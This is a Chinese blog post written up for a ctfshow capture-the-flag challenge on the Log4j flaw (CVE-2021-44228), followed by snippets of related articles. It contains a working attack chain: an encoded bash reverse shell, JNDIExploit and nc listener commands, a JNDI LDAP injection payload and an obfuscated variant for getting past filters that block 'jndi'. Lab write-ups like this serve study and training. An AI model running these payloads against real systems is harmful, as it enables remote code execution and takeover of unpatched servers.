ctfshow Log4j复现wp

最新推荐文章于 2023-09-03 20:31:08 发布
最新推荐文章于 2023-09-03 20:31:08 发布
阅读量2.9k 收藏 1
点赞数 2
分类专栏: 漏洞复现 ctfshow 文章标签: linux java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52829570/article/details/122496645
版权

声明:

该文章来自本人日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关

JNDIExploit

先将反弹shell的命令base64编码,然后将里面的+号和=号进行一次url编码

注:IP填vps公网ip,PORT要和nc监听的端口对应

bash -i >& /dev/tcp/IP/PORT 0>&1
# => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE=
# => YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D

然后启动JNDIExploit

java -jar JNDIExploit.jar -i ip -l 1389 -p 8180

用nc监听端口

nc -lvnp port

payload:

${jndi:ldap://ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D}

将payload注入后shell会被反弹到nc监听的端口上

拿到shell后cd到根目录后ls看到flag文件

cat之即可拿到flag

补充:

如果jndi被屏蔽,绕过方法

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D}

whathay
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Log4j2漏洞复现
MoCoCN的博客
12-22 2912
0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01漏洞描述 Apache Log4j2是一款优秀的
log4j-2.18.0
08-04
log4j2疑似0day爆发,影响版本为log4j2 大于等于2.0版本小于2.18.0版本 官方已经出了2.18.0版本 此版本可解决
ctfshow log4j复现 wp|CVE-2021-44228
spring!
03-24 4390
ctfshow log4j复现 wp|CVE-2021-44228
ctfshow-Log4j复现-log4j复现
wrypot的博客
08-21 664
另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令。1、买VPS,打开mobax进行ssh连接,开两个终端。
ctfshow—web—Log4j复现
最新发布
HAI_WD的博客
09-03 389
利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。log4j的payload是:${jndi:ldap://}这里选取的工具是:JNDIExploit。
Log4j复现
qq_56150805的博客
05-06 211
复现: 1.准备好vps服务器 2.安装ldap服务器 3.开启ldap服务器 4.监听nc -lvnp 1099 5.设置playload 6.cd / 回车 cat ctfshowflag 可见flag: ctfshow{cd64d28e-e9d9-4636-837a-7447c989aa5e}
log4j-2.17升级版本包
07-22
log4j-2.17升级版本包,包括log4j-1.2-api-2.17.1.jar、log4j-api-2.17.1.jar、log4j-core-2.17.1.jar、log4j-slf4j-impl-2.17.1.jar、log4j-web-2.17.1.jar
[Log4j]CVE-2021-44228 CTFshow
krysyal的博客
03-31 3554
Log4j复现 CTFshow 复现参考文档1 复现参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7729
log4j漏洞原理和靶场复现
Log4j2 RCE漏洞复现
守拙的博客
12-10 4469
最新log4j rce漏洞复现
log4j2复现试验
qq_41696858的博客
12-14 2157
之前bugku有一题是log4j2的复现,然后看到网上一个本地复现的帖子,那就拿这个帖子来做一个简单验证 原文地址:https://bbs.wxctf.com/thread-622-1-1.html 只有两台机器: 受害机ip:192.168.200.130:38080 攻击机:192.168.200.128(burpsuite,jndiexploit,nc) 环境docker拉一下,访问192.168.200.130:38080看见error页面就说明起起来了 说一下可能出错的地方,不要图省事,将dock
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7553
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
5 分钟复现 log4J 漏洞,手把手实现
weixin_44742132的博客
12-11 2739
2021年12月10日凌晨前,网上曝出了 log4j 的核弹级漏洞,这种漏洞超级高危,操作简单,利用方便,适用范围广,可以直接任意代码执行,接管你的服务器。此处思考曝光者凌晨曝光的原因,或...
安全漏洞之Log4j2漏洞复现绕过分析
热门推荐
kali_Ma的博客
12-12 2万+
0x00 介绍 Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告 分配CVE编号:CVE-2021-44228 CVSS评分:10.0(最高只能10分) POC比较简单 public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}"); } POC虽然简单,但是搭建LDAP环境显得有点复杂,m
log4j2漏洞简单复现
BING
06-06 2987
log4j2漏洞简单复现
Log4j漏洞复现
m1287578441的博客
06-08 2923
Log4j漏洞复现
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场中复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,将 Vulhub 项目克隆到本地: ``` $ git clone https://github.com/vulhub/vulhub.git $ cd vulhub ``` 3. 进入 log4j 漏洞环境目录:执行以下命令进入 log4j 漏洞环境的目录: ``` $ cd log4shell/CVE-2021-44228 ``` 4. 启动容器:执行以下命令启动容器,将漏洞环境运行起来: ``` $ docker-compose up -d ``` 5. 验证漏洞:容器启动后,你可以使用 curl 或浏览器访问 http://your-ip:8080/,将 "your-ip" 替换为容器所在主机的 IP 地址。如果返回的响应中包含 "Vulnerable" 字样,则表示漏洞存在。 请注意,这只是一个简单的漏洞环境复现示例,用于学习和实验目的。在实际情况中,你需要根据具体的情况和要求来进行漏洞测试和修复工作,并确保遵守法律和道德规范。另外,随着漏洞修复和漏洞利用工具的更新,复现步骤可能会有所变化。建议在复现之前先查阅相关的文档和资料。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

whathay

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值